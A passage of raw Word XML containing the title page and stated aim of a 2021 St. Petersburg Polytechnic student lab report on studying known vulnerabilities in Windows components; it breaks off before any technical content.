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C33F6" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk110511910"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Министерство образования и науки Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A123BE2" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Санкт-Петербургский </w:t>
      </w:r>
      <w:r w:rsidR="00C6615B" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">олитехнический </w:t>
      </w:r>
      <w:r w:rsidR="00C6615B" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>У</w:t>
      </w:r>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ниверситет</w:t>
      </w:r>
      <w:r w:rsidR="00FF6364" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Петра Великого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38902CF0" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="993"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64932459" w14:textId="17DA51F9" w:rsidR="00C53ADA" w:rsidRPr="000B0124" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0124">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Институт </w:t>
      </w:r>
      <w:r w:rsidR="006A0434" w:rsidRPr="000B0124">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>кибербезопасности и защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE65686" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E925DF9" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602BE6B5" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3E9203" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7431E9" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290C2DC1" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53441A28" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AC5096" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9C8573" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6794C3A6" w14:textId="7795C432" w:rsidR="002E1B2A" w:rsidRPr="00965F2D" w:rsidRDefault="00EC5DF3" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="62"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="62"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ЛАБОРАТОРНАЯ РАБОТА № </w:t>
      </w:r>
      <w:r w:rsidR="00D41BDD">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="62"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122A6B9" w14:textId="77777777" w:rsidR="002E1B2A" w:rsidRDefault="002E1B2A" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCE4B16" w14:textId="77777777" w:rsidR="000B0124" w:rsidRDefault="000B0124" w:rsidP="000B0124">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABE2F10" w14:textId="4C43FE47" w:rsidR="006479BC" w:rsidRPr="00BF4F0B" w:rsidRDefault="00BF4F0B" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение известных уязвимостей компонентов ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4F0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F2F470" w14:textId="2D204923" w:rsidR="002E1B2A" w:rsidRDefault="002E1B2A" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>по дисциплине «</w:t>
      </w:r>
      <w:r w:rsidR="008D0035">
        <w:t>Модели безопасности компьютерных систем</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600EBB9" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:ind w:hanging="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5FF38C" w14:textId="5C69529D" w:rsidR="00C53ADA" w:rsidRPr="003741FC" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:ind w:hanging="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9342ED" w14:textId="77777777" w:rsidR="002E1B2A" w:rsidRPr="00663210" w:rsidRDefault="002E1B2A" w:rsidP="0071002F">
      <w:pPr>
        <w:ind w:hanging="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0099F6" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRPr="00663210" w:rsidRDefault="00830F2D" w:rsidP="0071002F">
      <w:pPr>
        <w:ind w:hanging="567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611F71D2" w14:textId="6537666F" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Выполнил</w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E5E15" w14:textId="007A1A19" w:rsidR="000A461F" w:rsidRPr="00663210" w:rsidRDefault="00961BBB" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>студент</w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ка</w:t>
      </w:r>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> гр.</w:t>
      </w:r>
      <w:r w:rsidR="006A0434">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidR="000D7F80">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="006A0434">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="000D7F80">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006A0434">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/90</w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>801</w:t>
      </w:r>
      <w:r w:rsidR="00C53ADA" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A461F" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="00C53ADA" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003C218B" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кулеева А.Г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C0878" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="000A461F" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDD050" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                </w:t>
      </w:r>
      <w:r w:rsidR="003C218B" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D7C69" w14:textId="3B6D001E" w:rsidR="00C53ADA" w:rsidRDefault="00842D89" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Руководитель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA433B" w14:textId="761C8029" w:rsidR="009508F2" w:rsidRPr="00663210" w:rsidRDefault="009508F2" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ст. преподаватель</w:t>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Pr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008D0035">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян Т.Д</w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A787A" w14:textId="68D22BED" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="0"/>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A461F" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003C218B" w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C99DE" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D57A04E" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE6BFD9" w14:textId="77777777" w:rsidR="002E1B2A" w:rsidRPr="00663210" w:rsidRDefault="002E1B2A" w:rsidP="0071002F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436DC449" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="0071002F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3269F7EA" w14:textId="77777777" w:rsidR="000A461F" w:rsidRPr="00663210" w:rsidRDefault="000A461F" w:rsidP="0071002F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F72D7D" w14:textId="77777777" w:rsidR="000D7F80" w:rsidRPr="00663210" w:rsidRDefault="000D7F80" w:rsidP="002E1B2A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3351CB" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="00663210" w:rsidRDefault="00C53ADA" w:rsidP="002E1B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E66132" w14:textId="69A7C32C" w:rsidR="002E1B2A" w:rsidRDefault="00C53ADA" w:rsidP="002E1B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:hanging="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="002E1B2A" w:rsidSect="008219C3">
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1276" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="007933D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA8E88" w14:textId="06DC692B" w:rsidR="008219C3" w:rsidRPr="0009557D" w:rsidRDefault="00E41021" w:rsidP="000D7F80">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ц</w:t>
      </w:r>
      <w:r w:rsidR="00B17E6C">
        <w:t>ель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619EC66" w14:textId="77777777" w:rsidR="00BF4F0B" w:rsidRDefault="00BF4F0B" w:rsidP="00BF4F0B">
      <w:pPr>
        <w:ind w:firstLine="851"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">зучение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">распространенных типов уязвимостей и </w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">способов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">их </w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>эксплуатации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на примере известных проблем безопасности компонентов ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A965ED" w14:textId="7BAACF79" w:rsidR="006479BC" w:rsidRDefault="00E41021" w:rsidP="006479BC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Х</w:t>
      </w:r>
      <w:r w:rsidR="006479BC">
